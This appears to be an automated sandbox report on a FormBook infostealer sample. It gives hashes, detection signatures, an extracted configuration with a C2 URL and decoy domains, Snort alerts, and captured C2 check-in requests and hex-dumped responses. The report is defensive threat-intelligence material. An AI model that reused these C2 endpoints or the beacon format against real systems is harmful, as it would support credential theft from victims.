Windows Analysis Report MAPO-PI.exe

Overview

General Information

Sample Name: MAPO-PI.exe
Analysis ID: 510736
MD5: c619bbbe3c374c8fd3e9f2c26d087496
SHA1: a8f7e80f2c8e7687789f2267935610f81bc773d4
SHA256: 260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection:

Found malware configuration
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.diofis.com/rigx/"], "decoy": ["cisworkfromhome.com", "pizzanpickle.com", "southusen.com", "pinarekinci.com", "themilocat.com", "goio.digital", "smoothed-way.com", "lifeinformpodcast.com", "transforming-leadership.com", "winebreak.net", "diversityleadershipprogram.com", "orrisinvest.com", "mylearningplaylist.net", "chiromsrealestate.com", "todaychat.info", "solevux.com", "giacomodifino.com", "escortagents.com", "handstandsandhairties.com", "getsettn.com", "rocketsanitizerbox.com", "ryanmelissa.com", "loiriemagazine.com", "comparedietdrops.com", "email-m3comva.com", "lescopainsdumarche.net", "samhing-hk.com", "themomentummakers.com", "thmmet.com", "theluxgalveston.com", "makelifesimpleagain.com", "133holbertonstreet.com", "ingam.design", "svgrbyts.com", "reunalia.com", "zumish.com", "202scott.com", "onllinetestbot.com", "homeofficetipps.com", "jollyfriendsglobal.com", "gardenstatemasks.com", "parkinsonfound.com", "fitpowersport.com", "decentrall.com", "zodiacoflauderdale.com", "0afd.xyz", "klutinariverfishing.com", "wanderlustmeetsmotherhood.net", "t7890.com", "espressomaschinen.store", "templarsy.com", "parastrong.com", "nongbake.com", "abcjapanese.com", "adorti.com", "sweeplux.com", "ssmjoin.com", "polyassemble.com", "sellmyhihome.com", "pekalonganhost.com", "sautilidades.com", "customwoodcuttingboards.com", "mindyourownbizzness.com", "jiujitsuspa.com"]}
Multi AV Scanner detection for submitted file
Source: MAPO-PI.exe Virustotal: Detection: 30%
Source: MAPO-PI.exe ReversingLabs: Detection: 39%
Yara detected FormBook
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 3.0.MAPO-PI.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.MAPO-PI.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.MAPO-PI.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.MAPO-PI.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: MAPO-PI.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: MAPO-PI.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 159.65.10.143 80
Source: C:\Windows\explorer.exe Domain query: www.lifeinformpodcast.com
Source: C:\Windows\explorer.exe Domain query: www.transforming-leadership.com
Source: C:\Windows\explorer.exe Domain query: www.diofis.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 109.232.217.55 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.diofis.com/rigx/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: AEROTEK-ASTR
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1Host: www.lifeinformpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1Host: www.transforming-leadership.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1Host: www.diofis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 28 Oct 2021 05:41:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "61797038-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Oct 2021 05:41:35 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"Referrer-Policy: no-referrer-when-downgradeConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 39 37 65 33 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 41 55 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 37 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 
69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.24content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache: misscontent-length: 33607date: Thu, 28 Oct 2021 05:41:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 39 2e 32 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 5f 54 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 
74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 44 69 6f 66 69 73 20 42 65 73 6c 65 6e 6d 65 20 76 65 20 44 69 79 65 74 20 4f 66 69 73 69 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://gmpg.org/xfn/11
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/#logo
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/#organization
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/#website
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/elma-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/maydanoz-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/meyve-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi-2/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/rahatlatici-cay/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/yulafli-kahvalti/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/01/cennet-tatlisi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/01/cikolatali-toplar/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/01/ketojenik-beslenme/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/19/aspir-yagi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/?s=
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/bize-ulasin/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/blog/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/category/guncel-diyet-meseleleri/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/category/sporcu-beslenmesi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/category/tarifler/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/comments/feed/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/feed/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hakkimizda/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/partnerlerimiz/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-includes/wlwmanifest.xml
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-json/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/xmlrpc.php?rsd
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com?sccss=1&#038;ver=5.5.6
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://api.w.org/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://m0n.co/ga
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://schema.org
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-FE02SN0XC6
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://www.monsterinsights.com/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknown DNS traffic detected: queries for: www.lifeinformpodcast.com
Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1Host: www.lifeinformpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1Host: www.transforming-leadership.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1Host: www.diofis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
